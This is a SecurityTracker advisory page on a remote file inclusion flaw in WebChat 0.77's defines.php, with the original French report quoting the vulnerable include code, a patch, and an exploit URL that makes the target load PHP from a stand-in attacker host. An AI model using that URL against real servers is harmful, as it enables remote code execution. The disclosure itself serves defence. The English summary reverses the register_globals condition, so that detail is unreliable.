SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Instant Messaging/IRC/Chat)  >   WebChat (webdev.ro) Vendors:   Toma, Daniel
WebChat Include File Bug in 'defines.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1006193
SecurityTracker URL:  http://securitytracker.com/id/1006193
CVE Reference:   CVE-2007-0485   (Links to External Site)
Updated:  Jul 7 2008
Original Entry Date:  Mar 3 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.77
Description:   An include file vulnerability was reported in WebChat. A remote user can execute arbitrary PHP code and operating system commands on the target server.

Frog-m@n reported that the 'defines.php' script includes the 'db_mysql.php' and 'language/english.php' files relative to the $WEBCHATPATH variable but does not validate that the included files are from the proper location. A remote user can specify a remote location for those include files, causing the target server to include and execute the remotely located files.

As an example, the following URL will cause the http://[attacker]/db_mysql.php file to be executed on the target server:

http://[target]/defines.php?WEBCHATPATH=http://[attacker]/

According to the report, this exploit is not possible is the register_globals parameter is set to ON.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target server. The code or commands will run with the privileges of the web server.
Solution:   No vendor solution was available at the time of this entry. The author of the report has issued an unofficial patch, available at:

http://www.phpsecure.info/

Vendor URL:  www.webdev.ro/products/webchat/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Sun, 02 Mar 2003 22:56:18 -0500
Subject:  WebChat


						WebChat
						*******
Informations :
같같같같같같같
Langage : PHP
Website : http://www.webdev.ro
Version : 0.77
Problme : Inclusions de fichiers

Developpement :
같같같같같같같
WebChat est un chat simple open source qui existe depuis quelques annes.

Le faille est relativement classique.
Dans le fichier defines.php, on peut voir les lignes de code :
-----------------------------------------------
<?
if (!isset($WEBCHATPATH)) {
	 $WEBCHATPATH = './';
}
include ($WEBCHATPATH.'db_mysql.php');
include ($WEBCHATPATH.'language/english.php');
[...]
-----------------------------------------------
On pourra donc inclure et faire executer les fichier http://[attacker]/db_mysql.php et 
http://[attacker]/language/english.php  dans le fichier http://[target]/defines.php, grce  une url
du type :
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
Ces fichiers se trouvant sur http://[attacker] seront alors executs comme du code php sur le
serveur http://[target]
et avec ses droits et restrictions.
Tout ceci n'est possible que si register_globals est sur ON.

Patch :
같같같
Dans defines.php, remplacer les lignes :
-----------------------------
if (!isset($WEBCHATPATH)) {
	 $WEBCHATPATH = './';
}
-----------------------------
par :
--------------------
$WEBCHATPATH = './';
--------------------

Un patch peut tre trouv sur http://www.phpsecure.info.
Credits :
같같같같
Auteur : frog-m@n
E-mail : frog-man@frog-man.org
Website : http://www.phpsecure.info
Date : 01/03/03


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC